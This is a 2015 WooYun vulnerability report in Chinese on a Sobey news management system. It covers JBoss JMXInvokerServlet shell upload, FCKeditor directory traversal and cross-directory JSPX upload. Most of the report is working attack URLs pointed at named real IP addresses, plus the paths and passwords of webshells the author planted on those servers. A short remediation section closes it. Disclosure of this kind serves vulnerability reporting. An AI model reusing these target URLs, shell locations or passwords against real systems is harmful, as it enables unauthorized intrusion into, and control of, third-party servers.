漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0111231
漏洞标题:Sobey某新闻系统通用型漏洞打包
相关厂商:索贝数码科技股份有限公司
漏洞作者: 路人甲
提交时间:2015-05-08 18:52
修复时间:2015-06-22 18:54
公开时间:2015-06-22 18:54
漏洞类型:文件上传导致任意代码执行
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-05-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-22: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
任意文件上传+文件遍历
详细说明:
成都索贝数码科技股份有限公司,成立于1997年,由1988年成立的成都科大时达电子研究所(CKD)和1993年成立的深圳索贝科技有限公司合并重组而成。公司注册资本8000万元,是国内广播电视行业规模最大的软件开发及系统集成的领军企业,是国内首屈一指的、能够提供总体解决方案专业设计和咨询的服务商。
在多次刷洞的过程中都遇到了该厂商的新闻管理系统,这次把问题一起提出,希望能够通过
1#任意文件上传(方式1)
问题原因jboss未正常配置,导致可通过http://*/invoker/JMXInvokerServlet等方式getshell,jboss的getshell方法很多,而该套新闻系统均采用jboss作为中间件,导致了问题的产生
以http://113.200.74.240:8080/news为例
小马地址:http://113.200.74.240:8080/myname/woo.jsp
一句话:http://113.200.74.240:8080/myname/wooyun.jsp
密码:woo0yun
拿shell过程简单
再提供以下几个案例复现jboss上传
http://113.200.74.236:8080/news/
http://113.200.74.236:8080/invoker/JMXInvokerServlet
http://113.200.74.236:8080/myname/woo.jsp
http://113.200.74.231:8080/news/
http://113.200.74.231:8080/invoker/JMXInvokerServlet
http://113.142.30.83:8080/news/
http://113.142.30.83:8080/invoker/JMXInvokerServlet
http://113.142.30.83:8080/myname/woo.jsp
等等,有些系统的shell要用不同的姿势拿,本文这里不对jboss拿shell的方法过多的评论
漏洞证明:
2#文件遍历,可以算是全版本
问题原因:fck编辑器
http://113.200.74.240:8080/news/widgets/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../
http://113.200.74.236:8080/news/widgets/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../
http://113.200.74.231:8080/news/widgets/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../
http://113.142.30.83:8080/news/widgets/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../
http://113.200.74.146:8080/news/widgets/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../
http://113.142.30.17:8080/news/widgets/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../
因为操作简单,所以不一一截图了
3#任意文件上传
问题原因,fck编辑器未正确配置,完全未进行任何配置,但有一点要注意,上传的文件夹不在站点的路径下,所以我们要跨文件夹上传
http://113.142.30.17:8080/news/widgets/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://113.142.30.17:8080/news/widgets/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector
比如我这个站,
我在根目录下传了wooyun.jsp,访问后会跳转,放弃
wooyun.jspx显示报了个错
wooyun.jspf勉强显示文本
最后发现传jspx马还是可以连接的
一句话:http://113.142.30.17:8080/news/wooyun1.jspx
密码:0t2t3
该一句话已删除
简而言之,结合fck遍历找到站点路径跨目录传jspx,shell即可,抓包后可得到poc,即下面的测试代码
以下案例供重现
http://113.142.30.17:8080/news/widgets/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://113.142.30.17:8080/news/widgets/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector
其实直接套用poc就好,如果重新抓包,记得把参数Type值放空,否则会上传失败
修复方案:
正确配置jboss
fck上传点过滤
正确配置fck编辑器
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝